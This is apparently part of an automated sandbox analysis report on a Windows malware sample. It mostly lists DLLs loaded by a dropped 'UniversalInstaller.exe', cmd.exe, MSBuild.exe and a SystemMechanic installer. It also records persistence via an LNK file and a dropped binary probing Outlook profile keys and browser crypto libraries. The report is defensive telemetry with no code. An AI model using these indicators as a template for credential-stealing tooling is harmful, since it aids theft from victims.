Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe	Section loaded: oledlg.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe	Section loaded: pla.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe	Section loaded: tdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winbrand.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: shdocvw.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: linkinfo.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ntshrui.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cscapi.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: bitsproxy.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: msvcp140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: d3d9.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: d3d10warp.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: dataexchange.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: d3d11.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: dcomp.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: dxgi.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: twinapi.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: dxcore.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: msctfui.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: uiautomationcore.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: d3dcompiler_47.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: secur32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ntmarta.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: windowscodecs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rasapi32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rasman.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rtutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe	Section loaded: oledlg.dll
Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe	Section loaded: oleacc.dll
Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe	Section loaded: netapi32.dll
Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe	Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe	Section loaded: samcli.dll
Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe	Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe	Section loaded: riched20.dll
Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe	Section loaded: usp10.dll
Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe	Section loaded: msls31.dll
Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe	Section loaded: dbghelp.dll
Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe	Section loaded: pla.dll
Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe	Section loaded: pdh.dll
Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe	Section loaded: tdh.dll
Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe	Section loaded: cabinet.dll
Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe	Section loaded: wevtapi.dll
Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe	Section loaded: shdocvw.dll
Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe	Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winbrand.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: shdocvw.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: secur32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ntmarta.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winnsi.dll

Source: C:\Users\user\Desktop\zLwT7vCojz.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: hplcabqlulk.22.dr

LNK file: ..\..\..\..\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Jump to behavior

Source: C:\Users\user\Desktop\zLwT7vCojz.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: zLwT7vCojz.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: mozglue.pdbP source: u48o.0.exe, 0000000A.00000002.1716466376.000000006C26D000.00000002.00000001.01000000.00000016.sdmp
Source:	Binary string: /_/obj/Release/Microsoft.ApplicationInsights/net46/Microsoft.ApplicationInsights.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2658504863.0000025672980000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp
Source:	Binary string: nss3.pdb@ source: u48o.0.exe, 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmp
Source:	Binary string: D:\Workspace\TFS\MAINLINE\ioloCore\Dysnomia\PerceiveHUD\obj\Debug\PerceiveHUD.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2651347788.00000256726B0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Cleanup\obj\Release\Cleanup.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2517001138.00000256583E0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: c:\release\WorkingDir\PrismLibraryBuild\PrismLibrary\Desktop\Prism\obj\Release\Microsoft.Practices.Prism.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2521152454.0000025659B80000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp
